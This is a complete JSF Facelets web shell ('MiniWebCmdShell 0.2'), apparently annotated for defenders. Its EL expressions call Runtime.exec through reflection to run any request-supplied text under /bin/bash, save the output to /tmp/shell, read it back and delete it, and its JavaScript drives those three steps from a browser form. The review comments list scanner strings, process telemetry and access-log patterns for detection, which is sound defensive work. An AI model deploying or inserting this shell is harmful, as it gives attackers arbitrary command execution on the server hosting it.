java_faces_shell.xhtml
<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:h="http://java.sun.com/jsf/html"
xmlns:c="http://xmlns.jcp.org/jsp/jstl/core">
<style type="text/css">
/* Dark page backdrop behind the panel. */
body {
  background-color: #383838;
}

/* Grey, bordered panel: half the viewport width, centred horizontally,
   with long output lines wrapped instead of overflowing. */
.wrapper {
  width: 50%;
  margin: auto;
  overflow: hidden;
  word-wrap: break-word;
  border: 2px solid black;
  background-color: #C0C0C0;
}

/* Inner padding area that holds the output pane and the input form. */
.field {
  margin: 20px;
}

/* Output pane: intentionally carries no declarations. */
.output {
}
</style>
<body>
<!--
Server-side dispatcher of this template. Which branch runs depends on which of
the request parameters "do", "cmd" or "clear" is present. Every branch reaches
JDK classes by reflection through the view object's class loader from inside an
EL expression, so the page needs no backing bean or compiled class of its own.

Review notes (defensive):
  * The "do" parameter is request-controlled and reaches /bin/bash unfiltered.
  * Strings visible here that content scanners and file-integrity checks can key on
    inside .xhtml templates: java.lang.Runtime, java.util.Scanner, java.io.File,
    getClassLoader().loadClass(, and the fixed path /tmp/shell.
  * Host telemetry to expect from this code: the application server JVM spawning
    "/bin/bash" with the argument "-c", spawning "rm /tmp/shell", and the file
    /tmp/shell being created, read and deleted.
-->
<c:choose>
<!-- Branch "do": builds the string "/bin/bash,-c," + parameter value + ">/tmp/shell",
     splits it on commas into a String[] and passes it to Runtime.getRuntime().exec(String[]).
     "1,2".split(",").getClass() exists only to obtain the String[] class for the getMethod
     lookup. The value of the expression (whatever exec returns) is rendered into the response. -->
<c:when test="${request.getParameter('do') != null}">
#{view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1,2".split(",").getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),("/bin/bash,-c,".concat(request.getParameter("do")).concat(">/tmp/shell")).split(","))}
</c:when>
<!-- Branch "cmd": echoes the parameter value, then constructs java.io.File("/tmp/shell"),
     wraps it in a java.util.Scanner, sets the delimiter to the pattern \Z and renders the
     result of next() inside the pre element (presumably the whole file content; confirm).
     The first File instance is created only so its class can be handed to getConstructor.
     The surrounding code element is the marker the client script uses to cut out the output. -->
<c:when test="${request.getParameter('cmd') !=null}">
<code>
<i>${request.getParameter("cmd")}</i>:
<pre>#{ view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("next").invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("useDelimiter", "a".getClass()).invoke(
view.getClass().getClassLoader().loadClass("java.util.Scanner").getConstructor(view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell").getClass()).newInstance(
view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell")
),"\\Z"
)
)}</pre>
</code>
</c:when>
<!-- Branch "clear": calls Runtime.getRuntime().exec(String) with the fixed command
     "rm /tmp/shell", removing the captured-output file. "1".getClass() supplies the
     String class for the getMethod lookup. -->
<c:when test="${request.getParameter('clear')!= null}">
${view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1".getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"rm /tmp/shell")}
</c:when>
</c:choose>
<!--
Operator-facing panel: an empty output pane (id "output") and a one-field form
(id and name "cmd"). The form declares no action or method; its onsubmit handler
calls startMagic(), which returns false, so the browser never submits the form
itself and all traffic comes from the script.
Review note (defensive): the footer text "Java Server Faces MiniWebCmdShell 0.2 by
HeartLESS." is a static string in the template and in every rendered response,
which makes it a cheap signature for file scans and response inspection.
-->
<div class="wrapper">
<div class="field">
<center>----------------------------------------------------------</center>
<div class="output" id="output">
</div>
<center>----------------------------------------------------------</center>
<center>
<form onsubmit="return startMagic()">
<input autocomplete="off" id='cmd' name='cmd' size='100' placeholder='command' style="text-align:center; "/>
</form>
</center>
<center><font size="1"><i>Java Server Faces MiniWebCmdShell 0.2 by HeartLESS.</i></font></center>
</div>
</div>
</body>
<script type="text/javascript">
// Single request object created at page load and reused by startMagic() for
// every request it sends. Falls back to the ActiveX control when the browser
// does not expose window.XMLHttpRequest.
var xmlhttp;
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
} else {// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
/**
 * onsubmit handler of the command form.
 *
 * Sends three GET requests to location.pathname (this same page) on the shared
 * xmlhttp object, using the current value of the #cmd input:
 *   1. ?do=VALUE   synchronous   - selects the server-side "do" branch
 *   2. ?cmd=VALUE  synchronous   - selects the server-side "cmd" branch
 *   3. ?clear      asynchronous  - selects the server-side "clear" branch
 * The text between the first "<code>" and "</code>" of the second response is
 * written into the #output element.
 *
 * Review note (defensive): one form submission therefore appears in access logs
 * as a do= / cmd= / clear sequence of GETs against a single .xhtml path, with the
 * typed text carried in the query string.
 *
 * @returns {boolean} always false, which stops the browser from submitting the form.
 */
function startMagic(){
try{
//execution: third argument false makes the request synchronous, so the next
//request is not sent until this one has returned
xmlhttp.open("GET",location.pathname+"?do=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
console.log(xmlhttp.responseText);
//reading: same input value, sent as the cmd parameter
xmlhttp.open("GET",location.pathname+"?cmd=" + encodeURI(document.getElementById("cmd").value),false);
xmlhttp.send();
// a and b are assigned without var/let, so they become implicit globals
a = xmlhttp.responseText.indexOf('<code>');
b = xmlhttp.responseText.indexOf('</code>');
// a+6 skips the 6-character "<code>" marker; the slice is inserted as markup, unsanitised
document.getElementById('output').innerHTML = xmlhttp.responseText.substr(a+6,b-a -6);
//cleaning: asynchronous (third argument true); the response is not read
xmlhttp.open("GET",location.pathname+"?clear",true);
xmlhttp.send();
}catch(e){
// any failure is only logged to the console; nothing is shown in the page
console.log(e);
}
return false;
}
</script>
</html>